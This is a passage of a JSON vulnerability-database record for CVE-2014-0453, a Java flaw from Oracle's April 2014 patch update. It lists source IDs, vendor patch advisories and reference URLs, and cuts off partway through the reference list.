"HITACHI", "id": "HS14-009", "trust": 0.3 }, { "db": "VULHUB", "id": "VHN-67946", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2014-0453", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126611", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126200", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130400", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127655", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126443", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127938", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126320", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "id": "VAR-201404-0374", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-67946" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T20:25:08.563000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "title": "1672080", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "title": "1681018", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "title": "1673836", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "title": "1679713", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "title": "MIGR-5096132", "trust": 0.8, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096132" }, { "title": "1674539", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "title": "1677387", "trust": 0.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "title": "1675945", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "title": "1682828", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682828" }, { "title": "1676703", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "title": "1680387", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387 " }, { "title": "1674530", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674530" }, { "title": "1678113", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "title": "1675588", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "title": "1681256", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "title": "1675343", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "title": "1681047", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "title": "Text Form of Oracle Critical Patch Update - April 2014 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014verbose-1972954.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2014", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "title": "April 2014 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2014_critical_patch_update" }, { "title": "JSA10698", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698\u0026actp=search" }, { "title": "HS14-009", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs14-009/index.html" }, { "title": "Oracle Corporation Java\u30d7\u30e9\u30b0\u30a4\u30f3\u306e\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b", "trust": 0.8, "url": "http://www.fmworld.net/biz/common/oracle/20140417.html" }, { "title": "jdk-7u55-nb-8-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49311" }, { "title": "jdk-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49315" }, { "title": "jre-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49319" }, { "title": "jdk-7u55-nb-8-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49310" }, { "title": "jre-7u55-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49314" }, { "title": "jre-8u5-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49318" }, { "title": "jdk-7u55-nb-8-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49309" }, { "title": "jre-7u55-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49313" }, { "title": "jdk-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49317" }, { "title": "jre-7u55-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49312" }, { "title": "jdk-8u5-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49316" }, { "title": "jre-8u5-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49320" }, { "title": "Red Hat: CVE-2014-0453", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0453" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2187-1" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2191-1" }, { "title": "Amazon Linux AMI: ALAS-2014-326", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-326" }, { "title": "Amazon Linux AMI: ALAS-2014-327", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-327" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0453" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672080" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674539" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675945" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676190" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676373" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676672" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676703" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677294" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679610" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680750" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681047" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681256" }, { "trust": 2.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683484" }, { "trust": 2.1, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096132" }, { "trust": 2.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 2.1, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.9, "url": "http://www.securityfocus.com/bid/66914" }, { "trust": 1.9, "url": "http://security.gentoo.org/glsa/glsa-201502-12.xml" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673836" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678113" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679713" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680387" }, { "trust": 1.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681018" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 1.8, "url": "http://www.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 1.8, "url": "https://www.ibm.com/support/docview.wss?uid=swg21674530" }, { "trust": 1.8, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.8, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59022" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59023" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59071" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59082" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59104" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59194" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59250" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59255" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59307" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59324" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59436" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59653" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59675" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59722" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59733" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60003" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60111" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60117" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60498" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60574" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60580" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61050" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61264" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852886808946\u0026w=2" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0453" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20140416-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2014/at140017.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0453" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687297" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678113" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-009/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685689" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_apr2014_advisory.asc" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/java/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680565" }, { "trust": 0.3, "url": "https://www.suse.com/support/update/announcement/2014/suse-su-20140639-1.html" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21685350" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180008" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678048" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398943" }, { "trust": 0.3, "url": "\thttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04398922" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675343" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681114" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21689151" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_15_2014_cpu" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_systems_director_storage_control_is_affected_by_vulnerabilities_in_ibm_java_sdk_cve_2014_0453_cve_2013_5772_cve_2013_5803_cv" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676528" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676752" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21680036" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004969" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59550" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv59555" }, { "trust": 0.3, "url": "\\https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677490" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673611" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676860" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679417" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180257" }, { "trust": 0.3, "url": "asa-2014-203" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679172" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680490" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21684716" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677072" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687813" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674530" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679197" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682529" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682526" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675588" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673013" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672047" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020184" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21679187" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682644" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677387" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678302" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674132" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680562" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673576" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679067" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21664899" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675205" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2420" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.2, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0462" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2405" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10698" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852886808946\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0453" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2187-1/" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0486.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0432.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0413.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2422.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2409" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4266" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4263" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4247" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6511" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4265" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2402" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6527" }, { "trust": 